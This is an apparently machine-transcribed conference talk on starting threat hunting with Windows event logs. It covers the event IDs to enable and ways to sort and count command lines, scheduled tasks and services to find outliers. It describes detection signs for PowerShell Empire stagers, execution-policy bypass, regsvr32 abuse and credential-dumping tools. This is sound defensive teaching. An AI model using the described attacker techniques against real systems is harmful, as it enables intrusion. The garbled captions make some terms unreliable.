Threat Hunting: Out of the Gate with Windows Logs

all right we're gonna go ahead and get started so I'd like to introduce Greg Longo and Bryan Gardiner Greg is a senior threat analyst on the jasc special ops team with over a decade of cyber security experience in both the public and private sectors prior to joining jasc Greg was the global threat management lead at cabeza Rho and held a number of technical positions at cert pardon me one second

sorry about that so where was I held a member or a number of technical positions at cert part of the software engineering Institute at Carnegie Mellon Greg has also been with US Air Force and National Guard since 2002 as a cyberspace operations officer and is currently the commander of the 166th communications flight along the way Greg has earned a Masters of Science degree from Carnegie Mellon along with a Bachelor of business administration from the University of Pittsburgh and a Master of Business Administration degree or degree from Wright State University Bryan has been a senior threat analyst on the jester special ops team Bryan has over eight years of experience in cyber security with previous positions which

include vulnerability analyst and security engineer across both public and private sectors prior to Jeschke Bryan worked as a senior Incident Response analyst with IBM x-force iris Aetna and her as the information security adviser of the security data analytics team Bryan earned a Bachelors of Arts degree from the University of Pittsburgh and Master of Science degree from Carnegie Mellon University so with that being said I'll go ahead and turn it over to you guys and yeah let's rock and roll okay thank you anybody hear us okay excellent so thank you for Zach thank for having us out thank your buddy for showing up to this talk thread hunting out of the gate with Windows logs not a super creative title

but I think you get the gist I know we're getting you right after lunch so the food comas gonna set in folks might be a couple beers in couple drinks in but appreciate you hanging with us we'll get through some early introductory material and then we'll really dig in some meat of the presentation here today so as Zack mentioned Brian and I both have spent some time in industry and as well as sort of the academia FFRDC land with CMU and the cert program so that means we know probably you know 50% of the people out here we've got some relationship with everybody but yeah we're excited to be here so you may be sitting there wondering why am I here

how many folks real quick this is the only audience participation I'll ask for have active threat hunting programs within your organization's okay how many of you guys that are not doing throughout hunting have at least heard of threat hunting or understand the general concept of threat hunting good okay so for the most part pretty much everybody this is really meant to be an introductory talk so I want to make sure we set the stage for that right we're gonna get into some details about what you can do with Windows logs and things like that but we're really gonna start the very beginning laid a foundation talk about what threat hunting is why it's really a thing for organizations

these days and then explain to folks how you can get started with minimal effort really using Windows logs which I'm guessing 99.9% of the folks out there have Windows logs in your environment you're probably already collecting those logs how do you make use of those in a threat hunting kind of capacity quick roadmap of where we're gonna go so we'll talk a little bit about you know again what is threat hunting why is it important why is it a thing what are the things you need to consider when you're building a threat hunting program how do you get started and then we'll really dive into the data Brian's going to go through a whole bunch of Windows logs that and a

couple use cases that'll be really interesting there's a lot of graphics on the slides but hopefully these become available to folks afterwards and then you can reference those when you're back at your your organization's so before we get into what what thread hunting actually is and how you're gonna get started let's talk a little bit about like why thread hunting what why did this discipline come about what were the the revelations and the recognition that really drove this this new kind of thing in our in our field right and a lot of that comes back to the realization that the adversaries that we're up against are becoming increasingly advanced and sophisticated in what they're doing that

our technology landscape is constantly evolving and what that means is that as we adopt new technology our attack surface is constantly expanding and we're always playing catch-up there it is an arms race between the defenders and the the adversaries but you know the cards aren't completely stacked against us as defenders and we'll explain why so this should resonate with most folks right there's you know out there new organizations I'm sure you've got some constellation of security controls those controls could be administrative or operational kinds of controls controls that are really driven by humans in the loop so think of your policies and your procedures and your separation of duties and and those kinds of things

you also have technical controls so you know your firewall rules your proxy rules your ACLs two-factor authentication all these kinds of technical controls that are in place and those controls whether they're Administrative operational technical they exist on the spectrum of your endpoints and your network right so you put all these things these these things together and this is what you use to protect your organization's but the adversaries follow this notion of the cyber kill chain that lockheed-martin coined in 2011 everyone aware of the cyber kill chain pretty common right and so you've got these controls that are in place and I call those exploitable gaps because that's what the adversary is going to be targeting but these are the these are

all the opportunities that the adversary has to define a hole in one of those those controls that you've put in place and at every stage along the kill chain that we have here whether it's recon weaponization delivery exploitation all along the line you're gonna have controls in place and there's gonna be opportunities for adversaries to discover vulnerabilities there and exploit those vulnerabilities right whether it's recon and you've got employees who are posting too much information on LinkedIn weaponization if they're grabbing stuff from your web sites and they're weaponizing PDF documents that you may be hosting out there are things like that there's all kinds of opportunities for the adversary to take advantage of the information

that we have out there so Security's not a zero-sum game it's an overused analogy you may have used it yourself but the idea of defending a castle right defenders you know we operate sometimes within some artificially constrained bounds and I mentioned that you know the cards aren't completely stacked against us you know you hear the phrase or the saying that yeah as defenders we've got a tough job we got to defend this entire you know cyber key terrain that we have right we've got all these systems that we're trying to keep track of inventory that we can't wrap our arms around IT networks ot networks things like that and the adversary just needs to find one

way to get in right and that's all they just need find one exploit that works and they're in meanwhile we've got defend all this stuff that's not exactly true right because as defenders we should have the upper hand and knowing our environment right i I do lista CLE we should understand what we have what's vulnerable what we need to protect how to protect it and the adversary yes they do need to find an exploit but they also need to put all the pieces together to get that exploit into your environment and to maintain some some form of stealth in order to carry out whatever it is they want to do right so they've got a pretty

challenging job ahead of them too and as defenders we need to detect one thing along those lines right we need to we need to find the spear phishing email right or the piece of malware that's that's beaconing out 4c2 right or something and we're onto that adversary and then it becomes an IR engagement and an investigation from that point on so I wouldn't say that the card is a completely stacked against us it's it is a back and forth but you know as defenders we're not completely hamstrung so you know we put all the controls in place but when an attacker breaches your network the fundamental thing is your your controls have failed somewhere right

you've got preventative controls that are in place and again think of you know those those technologies that are out there to stop an attack or stop a breach from actually happening from getting in the front door your email filters and your firewall rules and all those sorts of things right those are supposed to stop the adversary at the front door and then you've got detective controls you know so you're running a sim right and you've got other technology that should alert you when something does get in and fires off so an attacker gets in these controls have failed somewhere along the line the punchline to all of this is right that your controls will eventually

fail right that's that's the environment that we're in now we're in this sort of realm of assumed breach kind of kind of world again which is sort of where we're threatening threat hunting kind of came from but your your your your controls will likely fail attackers will get in and apply stay there right average 12 time for an attacker used to be in the mid 200 plus days I just read a recent report that that was down to just over a hundred days so good on us we're detecting the adversary a lot quicker but still that's you know over three months of an adversary in your network which gives them plenty of time to orient themselves to move laterally to

move from you know their beachhead to a complete foothold to something else in your environment to do recon and get what they need so you know over 100 days is still a significant of all time that we're up against so now--so threat hunting you know again a lot of you guys are doing it pretty much everyone has heard of it it came about I'll you know a while ago over a decade ago or so and it's really started to pick up here in the last number of years so when we talk about threat hunting what are we actually talking about when folks get into it and you know we can think of endor hype for a lot of this is you know

you've got a list of IP addresses or you've got a list of hashes and you start searching all your logs for that information for those indicators right indicator searching or indicator hunting it's not exactly what we're talking about when we talk about hunting threat hunting but it is an easy place to get started so we don't want to folks get confused and think okay so when I'm talking about hunting I'm talking about a malicious IP or a hash that now I just go off and search for in my environment we're looking for really more of detecting the adversaries behavior in our environment and not so much these these atomic indicator type things so as I mentioned

you know the first reference that that you can find on the Internet tracing back threat hunting back in 2009 you know the cyber defensive community for sure has really gained a lot from what's come out of the the DoD in the military some some friends at NSA in the vulnerability analysis and operations branch published this slide during a Red Team Blue Team presentation and this was sort of the first indication of this concept of hunt right and the idea of actively going out and searching for adversaries within your network so you know just a little tidbit interesting reading so what is hunting when we talk about it threat hunting is merely a means by which you as an analyst will

deliberately and proactively go out to search for the presence of compromised malicious activity suspicious activity something that you don't want in your environment that's been missed by your existing security controls the easiest way to to think think of threat hunting in my mind is as sort of a form of proactive I are really you know you're taking it upon yourself to go off and find this this adversary that you're presuming is already in your network and is and it's taken a foothold and then it's retrospective obviously so you know you're not gonna go back over you know a year's worth of time likely but within the last 30 days or 45 days to look for a specific kind of behavior

that you know the adversary exhibits is what we mean we talk about threat hunting so threat hunting is a hypothesis oriented process driven kind of activity what we've laid out is just five notional steps to the threat hunting process so starting out with a hypothesis something something that you want to find that's really the crux of threat hunting you've got an ID in mind this is what I'm gonna go search for and when I go off and look for that then you need to decide well based on what it is I want to look for what data do I need do I have that data how do I collect that data so you go through this sort of

data analysis kind of phase then once you go off and you collect all those those pieces of data you're doing a validation of your hypothesis did I find the threat that I was looking for if not why not do they not exist or did I not look in the right place and it's sort of an iterative process we would continue to cycle back and make sure that you're looking at everything that you need to be looking at and then you'll always want to be improving upon that process so find ways to not conduct manual hunts over and over but can you automate can you improve upon what you're doing and finally you want to make sure that

whatever it is that you have done through your head you're hunting engagement your hunting operation you have documented in some way some wiki or something so that you're able to retain that knowledge go back to it reference it in the future and build upon this sort of knowledge base that you've gained through hunting operations so how do you establish the hypothesis where we start miters done a tremendous amount of work in mapping attacker TTP's so the mitre attack framework is an awesome place to start a good reference for how adversaries have been known to operate environments their tactics their tools their techniques you know everything that they're doing this is an awesome reference but hunting is not an exact science and

there's a lot of different approaches right so you could take the approach I know that I have windows logs so what can I find in Windows logs okay that's sort of more of a data centric or a data driven kind of approach right you've got a certain piece of data what can you find in that data or you can take another approach where you say I understand this particular adversary or I read a threat report and I know that they exhibit this kind of behavior so then you say well how do I detect that behavior and what logs do I need what logs do I need to go get and that's sort of a more of a

threat Intel driven kind of approach right so you can look at it from a couple different perspectives what we're gonna talk about here or what we propose here is that most everybody has Windows logs so we're gonna do a combination of let's take those windows logs that we know you have that we know you can collect that we know you can go through let's map that against what we know about some adversaries like say you know schedule tasks as a persistence mechanism right pretty common so let's go through our windows logs and look for scheduled tasks right pretty low hanging fruit see what we can identify see if there's anything odd that stands out so

that's a great place to start in this a lot of what Brian is gonna be talking through and so building a plan so once you've got all this stuff in mind then you need to build a plan right again going back to understanding the adversary understanding what data you have or can get access to whether it's from the endpoint whether it's from the network are there things that you can only detect on an endpoint what kind of adversary activity is gonna generate Network artifacts that you can then pull right and again what do you have what do you need to get you go through your hunt you do your investigation you do various kinds of analytics on that data you've

got to do your interpretation of what it means right it's not always gonna be black and white cut and dry you're gonna have to interpret what you get back and whether or not that means something to you and your organization again kind of goes back to the idea that we as defenders do have the upper hand and that we have the best context of our environment right there's going to be some expert analysis or interpretation that you do with the data based on what you know the environment you may see things like TeamViewer in your environment right or remote access tools that might be suspicious it might be completely legitimate in another organization right so there's no blanket you know one size

fits all if you find this this is bad but it becomes an iterative process that you learn more about your environment as you go through it and again the documentation of course so I'm gonna pass it over to Brian Brian's gonna talk to some windows logs and some some interesting use cases all right is everyone still awake good and Ear okay cuz I'm about to put you to sleep um so I'm just kidding data is awesome I've worked in a variety of different roles throughout my years here and really what you can get from that is a different perspective and thread hunting whether you're a sysadmin and you can only get Windows logs or you

know whether you've got a full data Lake whole Hadoop stack and you're logging absolutely everything in here in that connected fridge you can really break down sort of where you want to be with your threat hunting you don't have to have all Network data all logging everything it can be very specific to your role at your company or the maturity of your company it just depends really what you have to work with so we're gonna talk about a couple of campaigns really quickly and then we'll dive into a bunch of the data that we need to do this stuff so Turla this one's awesome pretty much the reason I put this on here you can see it like

they've done a lot of stuff with the military a lot of stuff with government entities but they've been switching recently to a lot of PowerShell based activity and this is absolutely nothing new everyone knows about PowerShell although I was blown away though that they are actually using the profile to maintain persistence I don't think I've seen that before but it's a really interesting technique of course their payload too is power Stallion and there's a really good article on this that you can read they'll give you a lot of the i/o sees you can really like dig into this tooling and kind of see what's occurring with that but the interesting point here is when you start to look at like these

thread actors or these campaigns and sort of like the tooling that they're utilizing a lot of them have been go more and more and more open source like you're not seeing as much custom stuff you may from a couple of adversaries but a lot of this stuff is you can just go to github and pull it down and do work with that like it's pretty impressive and then this campaign Frankenstein this is my absolute favorite I think it's the funniest name in the world like I just imagined some like stock guy running into management being like oh my god we've been breached by Frankenstein in the management being like dude are you serious like is that Mary Shelley

Frankenstein or what are you talking about I just think it's hilarious but one of the things that's really interesting about this group is that they've completely abandoned their own tooling they are going to get hub pulling down what everyone has already done they're taking that information tweaking it a little bit and utilizing that so like when you start talking about attribution like primarily one of the best ways you can do this to a threat group is you take apart the code of the tooling that they're utilizing and that's how you identify them so what are we going to say now like attributions harm joy it was defended like Empire like it's not gonna fly anymore so it's gonna start becoming a

lot more interesting when you start to play the attribution game with some of this stuff and then all these tools to you can just go immediately like fruity c2 Empire they're out there you can start working with them and then the persistence mechanism here as well so they're utilizing win update so it's one of the scheduled tasks that they use this is really interesting as well nothing new something that's definitely out there but I just thought that this campaign was extremely interesting because they've actually broken away from custom tooling and they're just utilizing open source tools that are out there alright so now down to it required log sources almost everyone in here I'm assuming is a window shop so you have

your default logging this is stuff that is turned on by default you have it everyone sees it everyone looks at it there's a ton of information within there I'm not gonna lie you can do a lot of stuff with that you detect lateral movement account creation etc there's a lot you can do with that what I'm more interested in is the actual advanced auditing and then the reason for this is a lot of this comes from probably doing IR for the past year and a half and my current position and just working companies and seeing sort of what they're doing I can think of one case where one company actually had these logs um just about every other company

that I worked with didn't have any of this I know you're kind of probably thinking like well isn't there an EDR that picks up all this stuff there's a few out there that do but you still need this logging in your own environment there's a lot that you can do with this so the reasons for this advanced auditing it's really it's you know file this attacks PowerShell is everywhere living off the land persistence detection all of that stuff can be done with these logging sources implemented you don't need a million-dollar tool in your environment you have the tooling in there you just need a GPO change to set this up get the information flowing and I know -

everyone's like oh man it's this month's like the hottest thing in the world it's sweet I love it but to be honest with you from what I've seen with this and the customers that have implemented it 99% of them have just gone Swift security pull down do it no one looks at the configuration file no one understands that you know he just updated that but it's been a year how do you know he didn't leave something out that's able to get into your environment how is he understanding your environment better than you guys are so through doing this advanced logging there's a ton you can do this you can start building out the whitelist that you need

to put into that configuration file for sis Mon so it's a really good beginner stuff to start there once you have this down you understand what's occurring in your environment then move to sis Mon then get the extra log and get all the additional functionality that you want once you understand you know where you live all right this is guaranteed I know people ask us all the freakin time volumes because data is expensive depending on how you have it so this is just baseline one month thousand machines solid Windows Enterprise environment this is kind of the numbers that you're looking at so four six eight eight process creation that's the biggest one it's 147 million logs keep

in mind here they have failure enabled as well as command line logging so you could cut failure out of this you could reduce the volume you can get rid of 4103 module logging for power and just utilized script lock logging there's ways around this you can play with this stuff but this is just kind of an understanding I just want to show everyone that you know you can work kind of within your budget turn on what you need to maybe just deploy out to the machines you deem critical kind of see how the logging flows and then go from there all right so this is the biggest thing um I just I don't know why

environments don't have this like real quick show of hands who's logging this right now and knows like in their environment okay yeah that's okay um if there's one thing from this talk like you take away today it's just go implement this like put this in your environment and the key with this is you have to enable command line process auditing this essentially gives you the command line that is run for just about anything in your environment so if you think of process creation this is taking the actual process that's occurring in the environment if you run a command it's parent processes command XE command lines logged you have all of that there it is so rich for hunting it's

ridiculous and even just looking to see you know like what administrators are doing like what's occurring in the environment it is definitely the event ID to ensure that you have within your environment um so I did this for all of them we're gonna go through a couple of event IDs but I put this on here so when we share the slides you know exactly where to go how to set this up the screen shot that it looks like when I was searching for some of this stuff it's kind of difficult to find like a good resource that has all of this and I know everyone's like go to Microsoft site they don't have everything really

well laid out for advanced auditing I'll be the first to admit that so this is just a way you can come back look at the slides and be like give it to like your systems administrators look at it be like hey we need this GPO put in this is where you do it um this is what it looks like when you're within group policy and then this is the actual configuration file for enabling process creation four six eight eight so this is where like I have success and failure checked if you were worried about log volume you don't check failure here just run success go from there this is the actual command line configuration this is the most important

piece to enabling this so you have to have this configured all right and then what you can do with it so just like searching through logs you're gonna start to see I hope oh yeah you guys can see that sweet you're gonna start to see command lines that are like really ridiculously interesting when you start running stuff like whether you're doing this in a home lab or you're in your environment you can start correlating all of this data start looking through it and see I mean this is a no-brainer you can immediately see the huge blob of off you station you can see like the - Sta the W one it's definitely an empire stager the no op like this is the power

that you can get from it so by looking at that process command line if you have not enabled that with this logging you will not see this so like the log loses a lot of value immediately that's why it's so critical that you actually enable that so here's another one another malicious PowerShell this one's utilizing a service creation and then it's pointing to command exe power shells downloading stage another stager from an external IP so you're gonna start to see these types of malicious commands in your environment this is stuff that like you wouldn't normally ever be able to find I'm depending on like the tooling and the controls that you have in place this is free this is

in Microsoft you can turn this on and do this immediately alright my other favorite one so I know there's a talk earlier this morning the guy went over this pretty well it's it's awesome how many people that are in here like offensively utilize this technique can you like raise your hands like for pentesting red teaming anything alright no one wants to give that away okay I'm telling you right now as a blue team er um start looking for this because it's just insane what you can do with this technique so the breakdown to this is any single user can run this this isn't you don't have to be an administrator to type this command out and run this we

find it all of the time a really good example of this one of the customers I worked with we turned on four six eight eight we turned on the process command line log and what popped up is you can see on the bottom there the register 32 Exe it's like the second command line to the server ser whatever dot are you so that had been running in their environment on 15 machines for over a year unchecked they had no idea what that is is actually a piece of a remnant from the old Andromeda campaign from 2017 so the domain was definitely blown but it's one of those things that they had no idea and yes they had an EDR they had all

kinds of stuff it didn't relate any of this information until we started digging through the logs so it's one of those things that you really really need to enable this event ID start taking a look at it start seeing what's occurring you're gonna start to see probably remnants in your environment from past campaigns that you just didn't have the controls or the tooling in place to notice and the carbon black article is amazing on that it's a little bit dated but this is still a use technique we still find it all the time all right so other interesting behavior that you can do with this event ID this is a huge one in sans like if you take

in like a forensics course there it's pretty much you can look at the process launch location so when you think about like Windows system processes you think of like CSR SS like service host L SAS winning it there's tons but like a really good way to check this is if those aren't running from system 32 you've got an issue like if that's running from like app data temp or something like that there's definitely something occurring so you can write rules based on this to look at non-standard launch path locations it's immediate win you can see what's occurring right there um some of the other stuff you can do you can just start searching for command lines like

known things that adversaries use red team uses or just want to see what's occurring within your own environment on the human I like it's that's been used a billion times but it's still a giveaway because you know who you are on your system if that's running your environment chances are someone shouldn't be there netstat same thing looking for listening ports open ports etc and then you're going to see stuff like this like the net services piece schedule there's a lot of bushes main lines that are out there that do a lot of different things that are pretty bad turning off all the firewall profiles and then just the large chunks of obvious gated code you don't have to

know what the command line does but there's probably no one in your environment that's gonna run off you skated code that would just be weird it just wouldn't make sense okay so next of an ID four six nine eight scheduled tasks not as important as process creation but this is a huge one I mean how many adversaries how many campaigns and groups are out there that utilize scheduled tasks as a persistence mechanism how do you guys monitor those what do you look at do you have something that says like hey this was created our environment this is legit or this isn't there's tons of these out there um when you also enable some of these advanced audit policy rules will

also enable a bunch of other event IDs within this so like you might have like scheduled tasks updated deleted etc I'm just talking about like the main one for now there's still a lot of other stuff that you can do with the residual task or event IDs that are created as well okay this is the same so I'm just gonna skip through these like if you wanted to after you could find exactly how to set these up and configure them and utilize them and it's the same thing here as well log volume uncheck failure if you want to have a little bit less so just go into mitre looking at like the actual TTP's that are in there you can see all

of these groups every single one of them uses scheduled tasks for persistence if you are not monitoring scheduled task creation you are probably missing a massive chunk of this within your environment ok so here's another issue from previously I've done this before where you start looking for scheduled tasks when you're trying to find persistence and you go to the users computer this one's clean it only has like probably like eight but I've seen people that have hundreds and you're like oh my god I can never ever figure out what each one of these does that's a sort of a benefit to doing this and enabling this is if you have a time frame from some other indicator that's

fired in your environment you can go back and look at that time frame in the logs for this that would be one way to do it the other one you're gonna have to probably start googling a lot of stuff or praying that there's information within the schedule tasks that they filled out where you can get that information and understand actually what's occurring with that task easiest way to do it would be like to look at the naming convention and be like oh this one's garbled it's you know 30 characters uppercase lowercase that's probably not legit there's actually companies that do that so you you really have to kind of google around a little bit to do that alright so fin 7 this is

like just a current example one of the the persistence mechanisms that they utilize is they do a double schedule tasks or an lnk file when it's downloaded so the first one that you're gonna see is Intel and then the second one that's what I talked about it's that garble II like eat I think it's 12 characters actually uppercase and lowercase no numbers but you'll start to see this stuff you can start taking a look at these and if you start logging this what you could do is you could just do like a weekly task to do like maybe a count or a sort depending on the tooling that you have in your environment just list them out start looking at it just

maybe look at the user who created it look at the naming and go from there it's definitely something you should be monitoring and taking a much closer look at this is the same thing with Frankenstein as before they utilize win update which I would never see if I was just looking through a massive massive list of them but it's the same thing like you really have to pay attention to these you really have to understand what's occurring in your environment and they're surprisingly there shouldn't be as many scheduled tasks created in a Windows environment as you would think like a massive massive enterprise you might see maybe a thousand a month depending on how your administrators do

business within the environment it shouldn't be too too bad alright four six nine seven service creation so this is like I know people are gonna say it this is already in the logs this is in the system log 704 five by default it is but this is the way I rationalize this is it's like me living in Butler and my best friend in the South Hills we're making that friggin Drive like it doesn't matter he could be in California and be like the same thing it's getting somebody that's a security analyst or any kind of analysts in your company like how often do they dig into the system logs or the application logs it's like probably never so the reason that I

really like this one is it forces you to look at it because now it's in the security log all of your tools are probably ingesting just the security log so you're gonna actually see it now but this is just with Windows 10 and up into there all right so same set up group policy same thing here you can also do failure I'd recommend just doing success for this so in the attack framework this is the same kind of deal you're gonna have execution and you're gonna have persistence it's utilized in two different ways so it's definitely worth taking a look at like if you ever heard of like the SC command this logs it this will show you

that so this is just execution here this is persistence here I mean this is common all of the newest groups a lot of the older groups they're all utilizing this technique if you're not logging this you're definitely missing it all right so a quick example here so this is carbon at door I think I may have missed this up when I did it so it's what carbon act does is it takes a common service it just it's like Russian roulette it'll just take a common service name and it's gonna pin sis to it but I thought that it deleted the actual last character of the service and I think it does the first so this is

backwards but you can see when services are actually created within a Windows environment you're gonna have this information you're gonna have the account name that created it and you can take a look at it a lot of times I'm not gonna lie these are gonna blend in so well that you're really gonna have to pay attention like just a letter off something of that nature sometimes though you will see just basic garbage across there and you know that that's probably gonna be a malicious process that's running within your environment all right I hate talking about this everyone has done this before but it just pains me so much one customer in the past year and a

half has PowerShell logging enabled this is a massive tool like for the blue team for your offensive team for everybody within the environment so real quickly how many people actually have this enabled and know that it's enabled in their environment okay yeah this is something you just have to do it look at all of the tooling that's out there look at all the presentations that you see it like DEFCON everywhere how are you guys catching this activity if you're not logging PowerShell you're not catching it so it's getting through your environment this is the simplest logging solution that you can put into play and get wins immediately from so there is volume issues with this as well this can

be super noisy so if you have to pick pick script block logging this is the log that you want you do not want to go with module logging if volume is an issue so script block logging freaking awesome the best log that windows has come up with in the past couple years would be my opinion it captures pretty much the full command and the contents of the script it can do a little bit of deification it might not necessarily make the code readable to you but enough where you can do something with it and know that something is occurring on so pretty much it shows who executed the script when it was run regardless of how

PowerShell was executed it ends up here set up same kind of deal that's where it is in group policy this is where you configure it and then examples empire stager I mean everyone knows what Empire is it's used by so many people so many red team's adversaries actors whatever it's there if you're not logging this you are not catching this you're not gonna see this occur so it's based on like a listener stager and an agent the key giveaway here for Empire it's the - sta which means PowerShell is pretty much in single threaded mode I still have no freaking idea why they do that if anyone knows come find me after and tell me because PowerShell is

multi-threaded so I don't know why they would do this but you're gonna see like the no op for no profile with the sta and then the W one that's a dead giveaway for Empire in your environment other interesting behavior that you can do with this just start looking at off you station nothing like I said before should be obvious gated in your environment unless like you've got like a rogue coder going on or something occurring that's very weird some of the arguments you can look at there's a excellent talk by Daniel Bohannon kind of goes into this he did invoke obfuscation and a few other tools as well there's so many variants to this but you can just start with the basics a

lot of people won't put the effort into like completely off you skate this or make it ridiculous where you can't read it you can just look for no profile or no op just see what occurs within there and then set execution policy this is not this is not a security control in any freaking way all you have to do is type dash bypass and you're through this no matter what occurs so many companies are like oh we'll just put that on and we're good to go no do script signing do something else this will not work and it's a hell of a good way to search like you can just start typing - bypass look in your for

104 logs if that comes up I've seen it before in companies where the admins utilize it because they don't really they didn't configure it appropriately but generally in most environments when you pull that up and that occurs it's something bad it's it's not gonna be anything good um and then the other thing with this - is you can also if you have four six eight eight involved like the process creation and you're starting to look at like the command lines like one of the awesome things you can start to do with that is you can break those command lines down maybe just throw them out into an Excel and look at the file names that are being executed like it

may not be you know just a basic powershell it might not be like bob's powershell at ps1 like you're gonna see blobs like this because they auto generate them it's not gonna be something named normally so that might be another really good giveaway right there alright module logging so this is the one if you have volume issues do not enable this it's not as robust as script block logging in my opinion it's useful but it's not as useful if you have the all you do both you can do that so it's pretty much pipeline execution details get a little bit of the variable initial initialization the problem with this one is though you will not always get the

full script so you're gonna get pieces of the script and you're not gonna really understand kind of probably everything that's occurring that's why I always say go with script block logging it just works much much better that way all right set up group policy configuration so this is one of the use cases where I do utilize it for PowerShell remoting so you've like NR PS session you can utilize invoke WMI and you have invoke command so when PowerShell is pretty much using remoting you have to utilize win RM for this which if any system administrator in your environment is using PowerShell when RM is enabled already so you're gonna see probably some of these commands they may be just an

administrator doing his job or it may be you know something malicious but well you can see at the top is I think it's like the very top you see like enter PS session so sometimes what I'll do with this is just if I find like an interesting command lit or argument that's run I'll search this first and see if there's any hits and then I'll go into a script LOC logging 4104 and pull down the actual information that I'm interested in um so here's another example this is still the same Empire stager this is kind of what you're gonna see it's not as robust you're gonna get partially I think most of the blob on

this one you'll get but not everything in there ok so those are all of the windows logs that most people do not have enabled that's the stuff that you need to enable in your environment I'm telling you right now like it could save a lot of money from a very expensive EDR solution if you're a smaller a midsize company turn those on first you can find persistence that way you can find a lot of bad that way before you move up so basic thread hunting strategies with this stuff once you have it I view a mix of like statistical analysis and then data analysis so what I look like the biggest things is everyone's like oh

you've got a baseline your entire environment well that's a lot of work most people don't do that so you can sort a lot of this stuff if you look at like all the command lines that are being run in your environment or all the scheduled tasks the highest numbered ones those are going to be allowed that's probably gonna be on every system in your environment which is why it has the highest count all the way down to you know maybe like halfway in that list that's probably your baseline for the most part in your environment then you have your outliers at the bottom that are like one offs two offs those are the ones you start looking at immediately

that's the stuff where it's like that probably shouldn't be here it might be interesting but that's where you're gonna go with it so there's a lot you can do this you know visualization as well like if you have like a tableau license or something you can throw all of these weird logs into that and visualize the data if that works for you instead of staring it Splunk looking at a white list the whole day you can look at blobs that are color-coded and very interesting I've pulled information out of this especially with a sock where you have a very large enterprise sock that's may be spread across in a couple of different countries and say you take a

look at like IP scanning like socks always like I had nothing got through closed it if you take all of the IP scanning for a month from all of those sock analysts and you put it into a visualization you might start to bubble up and say like hey this IP range is hitting that country this country this country at certain times and dates but you're not gonna see that when every single person's closing stuff and they're not really communicating as to what they're closing like your very basic alerts can turn into very powerful information and then Osen Greg you mentioned this before you can still do this kind of stuff read affect report AT&T cybersecurity

which bought alienvault otx is still free I hope for a lot longer but we'll see virustotal you can go to intelligence and get tons of information out of that research lab like your home your office whatever you guys like play around with runn tools capture these logs start trying to check that stuff at work and then Twitter you can get a ton of information from that so this is just super quick this is Apache Zeppelin so it's open source this is kind of one of the ways that we hunt with all of our data we throw it into here put this on top you can do sequel sparks equal Python etc whatever language you like

this is a super basic sequel query and I was just doing what I told you guys I was counting all of the command lines in a month actually no I was doing one day because of the data size it's just looking so I went immediately to the bottom to the one offs and I'm just scrolling up looking at those and seeing there's anything interesting and you immediately have the powershell with like window style hidden etc etc and you know that's not gonna be good but this is one way that you can do it and you can do this with so much data it doesn't have to be you know command lines you can do it with logging account creation

etc you do it with a lot of stuff so here's another one this one is pretty much service named doing the same thing looking at services that are common within the systems in your environment and if you do this this is a really good way as well to baseline the services that are acceptable within your company and then you're gonna start to see at the bottom when you start going towards those outliers those anomalies that are down there you're gonna start seeing weird names so you can see like the SVC host assist doesn't really match the other ones are numbered as well I'm not sure why but it stands out it's somebody to look into you can dig into that if

you have the logging um here's another one as well so this one is just what I told you guys just start basic you don't have to go immediately and write this crazy freaking reg X it's gonna match everything in the world just start with bypass look at that like is anyone running that in your environment okay I gotta go talk to Bob because he's running bypassed every time he does like a GPO push or something like that you're still gonna find bad stuff you're still probably gonna find stuff that's occurring within your environment that's expected but this could also be a talking point to be like hey we need to do a little bit more security around

PowerShell if people are running this um and then the last one this is like the funniest thing because you would never expect this to actually occur in an environment but it does sometimes people are super freaking lazy and they won't rename any cats this happens like I will go into an environment that's brand-new and still run this every time because you never know like you can really just pull one out and be like oh that was awesome but a little work in next time but yeah it's the same kind of principle start very basic like even if you feel like uncomfortable like this should probably never happen you never know like you can get a win

out of the most basic search terms in here one of the things that we wanted to get to that we never ended up being I'll put together for this presentation is a little demonstration and some open source tool information so as a poor substitute we just threw this slide in when it comes to Windows systems OS query win log beat and system on in addition to you know just native Windows OS logging those are some good tools that you might want to go out and take a look at and then we've got tools that also support the analysis the data so we talked a lot about like you know how you go about hunting what you can find and

all these windows logs that Brian went through and we just kind of waved our hand and basically said yeah you've got access to all these logs and you've got some platform where you can query these logs and do you know the Apaches up one kind of analytics and things like that but there is some work that goes into setting up those environments so you know open source help hunter those are some great platforms to go off and take a look at and will give you an environment sort of an complete all-in-one package and some really great work that those guys have done in the community and around the open-source threat hunting world so just some things

to take a look at so just wrapping things up you know hopefully you got something out of this presentation when it comes to getting started with threat hunting if you're not doing it already Windows logs are a great place to start obviously you've got to have you know when you comes to building a program people process technology alright so it comes with the you know look at the people you gotta have analysts that actually know how to do this analysts that can dedicate time to it it's not something that you can just take you know thirty minutes a day and try and accomplish in any sort of effective manner so wrap some analysts around it spend some time on it you'll

you really see a return there make sure you follow the process grab some data start with Windows logs easy place and and leverage some sort of platform starting maybe with open source just to get your hands dirty and with that thank you very much for attending appreciate

if you guys have any questions we'll be sticking around you know you can ask us now we got a couple minutes or just catch us afterwards